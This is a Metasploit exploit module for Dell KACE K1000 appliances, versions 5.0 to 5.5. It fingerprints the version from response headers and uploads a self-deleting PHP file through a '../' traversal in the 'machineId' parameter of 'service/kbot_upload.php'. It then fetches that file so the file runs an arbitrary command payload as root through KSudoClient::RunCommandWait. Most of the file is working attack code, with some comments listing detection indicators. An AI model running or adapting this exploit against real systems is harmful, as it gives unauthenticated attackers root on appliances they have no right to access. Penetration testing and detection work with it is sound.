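##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Dell KACE K1000 unauthenticated file-upload module.
#
# Two HTTP requests are involved: a POST to 'service/kbot_upload.php' whose
# 'machineId' parameter carries a run of '../' followed by the target
# directory, and a GET of 'tmp/<fname>' that fetches the uploaded PHP file.
# Both requests, and a dot-prefixed '.php' file appearing under
# /kbox/kboxwww/tmp/, are the observable indicators on the appliance side.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Dell KACE K1000 File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in Kace K1000
        versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
        which allows unauthenticated users to execute arbitrary commands
        under the context of the 'www' user.

        This module also abuses the 'KSudoClient::RunCommandWait' function
        to gain root privileges.

        This module has been tested successfully with Dell KACE K1000
        version 5.3.
      },
      'License' => MSF_LICENSE,
      'Privileged' => true,
      'Platform' => 'unix', # FreeBSD
      'Arch' => ARCH_CMD,
      'Author' =>
        [
          'Bradley Austin (steponequit)', # Initial discovery and exploit
          'bcoles', # Metasploit
        ],
      'References' =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
        ],
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x27",
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl'
            }
        },
      'DefaultTarget' => 0,
      'Targets' =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DisclosureDate' => '2014-03-07'))
  end

  # Fingerprints the appliance and its version from the response headers of
  # an unauthenticated GET to 'service/kbot_upload.php'.
  #
  # @return [Exploit::CheckCode] Unknown when no response arrives; Safe when
  #   the host does not answer 500 with an 'X-DellKACE-Appliance: k1000'
  #   header, or reports a non-5.x / patched build; Detected when the
  #   appliance header matches but 'X-DellKACE-Version' is absent or not
  #   MAJOR.MINOR.BUILD; Vulnerable for 5.0-5.3, 5.4 <= 5.4.76849 and
  #   5.5 <= 5.5.90547.
  def check
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    # A 500 response that lacks the appliance header (any generic error page)
    # must not raise NoMethodError; a missing header means "not a K1000".
    appliance = res.headers['X-DellKACE-Appliance'].to_s
    return Exploit::CheckCode::Safe unless res.code == 500 && appliance.casecmp?('k1000')

    version = res.headers['X-DellKACE-Version'].to_s
    match = version.match(/\A([0-9])\.([0-9])\.([0-9]+)\z/)
    return Exploit::CheckCode::Detected unless match

    vprint_status("Found Dell KACE K1000 version #{version}")
    major, minor, build = match.captures.map(&:to_i)
    return Exploit::CheckCode::Safe unless major == 5

    vulnerable =
      case minor
      when 0..3 then true         # 5.0 to 5.3
      when 4 then build <= 76849  # 5.4 prior to 5.4.76849
      when 5 then build <= 90547  # 5.5 prior to 5.5.90547
      else false
      end
    vulnerable ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  end

  # Uploads a PHP file through the unauthenticated 'service/kbot_upload.php'
  # endpoint, then requests it from 'tmp/<fname>' so the web server runs it.
  #
  # The PHP body deletes its own file before handing the encoded payload to
  # KSudoClient::RunCommandWait, the helper the module relies on for root.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the host is unreachable,
  #   the upload does not return 200, or the uploaded file cannot be fetched
  #   (404 is reported as NotVulnerable, anything else as UnexpectedReply).
  def exploit
    # upload payload
    fname = ".#{random_token}.php"
    payload_path = '/kbox/kboxwww/tmp/'
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
    print_status("Uploading #{fname} (#{post_data.length} bytes)")

    # 'machineId' carries the '../' run plus payload_path; presumably the
    # appliance joins it into the upload destination (the file is fetched from
    # tmp/ below). GET parameter order is randomised per run.
    upload_params = {
      'filename' => fname,
      'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
      'checksum' => 'SCRAMBLE',
      'mac' => random_token,
      'kbotId' => random_token,
      'version' => random_token,
      'patchsecheduleid' => random_token
    }
    res = send_request_cgi(
      'uri' => normalize_uri('service', 'kbot_upload.php'),
      'method' => 'POST',
      'vars_get' => upload_params.to_a.shuffle.to_h,
      'data' => post_data
    )

    fail_with(Failure::Unreachable, 'Connection failed') unless res

    if res.code == 200
      print_good('Payload uploaded successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
    end

    # execute payload
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

    fail_with(Failure::Unreachable, 'Connection failed') unless res

    case res.code
    when 200
      print_good('Payload executed successfully')
    when 404
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
    else
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
    end
  end

  private

  # Random alphanumeric string of 5 to 12 characters, used for the file name
  # and for the filler request parameters.
  def random_token
    rand_text_alphanumeric(rand(8) + 5)
  end
end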